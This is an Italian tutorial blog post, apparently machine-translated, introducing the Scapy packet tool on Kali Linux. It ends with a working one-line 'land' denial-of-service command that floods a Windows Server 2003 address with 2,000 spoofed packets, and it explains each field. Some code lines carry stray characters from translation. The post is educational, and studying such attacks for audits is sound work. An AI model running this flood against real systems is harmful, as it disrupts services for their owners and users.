Scapy è un mezzo universale per implementare attacchi di rete.
Oleg Petukhov, avvocato nel campo del diritto internazionale e della protezione dei dati personali, specialista nel campo dell'informazione sicurezza, protezione delle informazioni e dei dati personali.
Canale Telegram: https://t.me/protezionedelleinformazioni
Gruppo in telegramma: https://t.me/protezionedelleinformazioni1
Sito: https://legascom.ru
E-mail: online@legascom.ru
#protezionedelleInformazioni #sicurezzadelleinformazioni
Prima di iniziare a considerare i tipi di attacchi di rete, vorrei presentare al lettore un altro strumento interessante e flessibile incluso in Kali Linux, che è L'utilità Scapy. Questa utility flessibile e funzionale è scritta in linguaggio Python. Questa utility è progettata per la manipolazione dei pacchetti di rete. Con il suo aiuto, è possibile assemblare il pacchetto IP della struttura desiderata necessaria per condurre attacchi di rete.
Prima di iniziare con Scapy, è necessario ricordare la struttura del pacchetto IP.
Lavorando con L'utilità Scapy, compileremo autonomamente questi campi con le informazioni necessarie.
Quindi eseguiamo Scapy.
root@kali:~# scapy
>>>
Dopo aver avviato l'utilità, il prompt di input è">>>". La presenza di questo prompt indica che Scapy è in modalità interattiva e tutti i comandi immessi verranno interpretati dall'utilità.
Per cominciare, vediamo la configurazione corrente.
>>> conf
Il comando conf visualizza le impostazioni correnti dal file di configurazione.
Ora dobbiamo creare il nostro pacchetto. Come sapete, lo stack TCP / IP in vari sistemi operativi si basa sulla conformità agli standard RFC che definiscono l'interazione di rete. Ma per eseguire vari attacchi, i pacchetti creati non devono sempre essere pienamente conformi agli standard RFC.
In Scapy, prima di tutto è necessario definire le variabili e gli attributi del pacchetto desiderati. Così, la variabile X Y determinerà il valore ttl del pacchetto pari a 64.
>>> x=IP(ttl=64)
>>> x
Successivamente, aggiungiamo altri attributi al nostro pacchetto. Prima di tutto abbiamo bisogno degli indirizzi del mittente e del destinatario. Nell'esempio seguente, il mittente è 192.168.1.101 e il destinatario è 192.168.1.122.
>>> x.src="/192.168.1.101"
>>> x.dst="192.168.1.122"
È possibile controllare i valori correnti della variabile x semplicemente specificando il nome della variabile data nell'interprete.
>>> x
Oltre a questo, Scapy ha molte funzioni integrate. Puoi scoprire queste funzioni usando il comando lsc.
>>> lsc()
Useremo il comando «Invia»come altro esempio. Questo comando viene utilizzato quando è necessario inviare un pacchetto. Ad esempio, proviamo a inviare il pacchetto che abbiamo creato nella variabile x.
>>> send(x)
Come puoi vedere, il nostro pacchetto appositamente creato è stato inviato all'indirizzo del destinatario. Allo stesso modo, è possibile specificare altri parametri del pacchetto IP come window_size, flags, fragmentation, acknowledgement, sequence number.
Ora eseguiremo un piccolo attacco DDoS con Scapy. Supponiamo di avere un sistema di destinazione che esegue Windows Server 2003 (stranamente, finora centinaia di migliaia di server eseguono questo sistema operativo) ed è vulnerabile a un attacco di tipo «land». Questo attacco DoS consiste nell'inviare un gran numero di pacchetti con gli stessi indirizzi IP e porte del mittente e del destinatario. Come risultato dell'esecuzione di questo attacco, la macchina non si bloccherà necessariamente, ma si verificherà un rallentamento nel sistema. Ad esempio, per i server web, un tale attacco può essere critico.
Con Scapy, questo attacco può essere implementato come segue.
>>> send(IP(src="/192.168.1.122", dst="192.168.1.122")/TCP(sport=135,dport=135), count=2000)
In questo esempio:
send-invio di un pacchetto;
Protocollo IP utilizzato;
src= "192.168.1.122" - sorgente del pacchetto;
dst= "192.168.1.122" - ricevitore del pacchetto;
Protocollo TCP a livello di trasporto;
sport=135-porta sorgente;
dport=135-porta del destinatario;
count=2000 è il numero di pacchetti che vogliamo inviare.
Scapy non è solo un mezzo per implementare attacchi denial of Service.
Con questa utility è possibile creare qualsiasi pacchetto con i campi e il contenuto desiderati. Pertanto, consiglierei di utilizzare questo strumento durante gli audit di sicurezza delle informazioni.
Nei prossimi post, torneremo a esaminare gli attacchi a livello di rete.
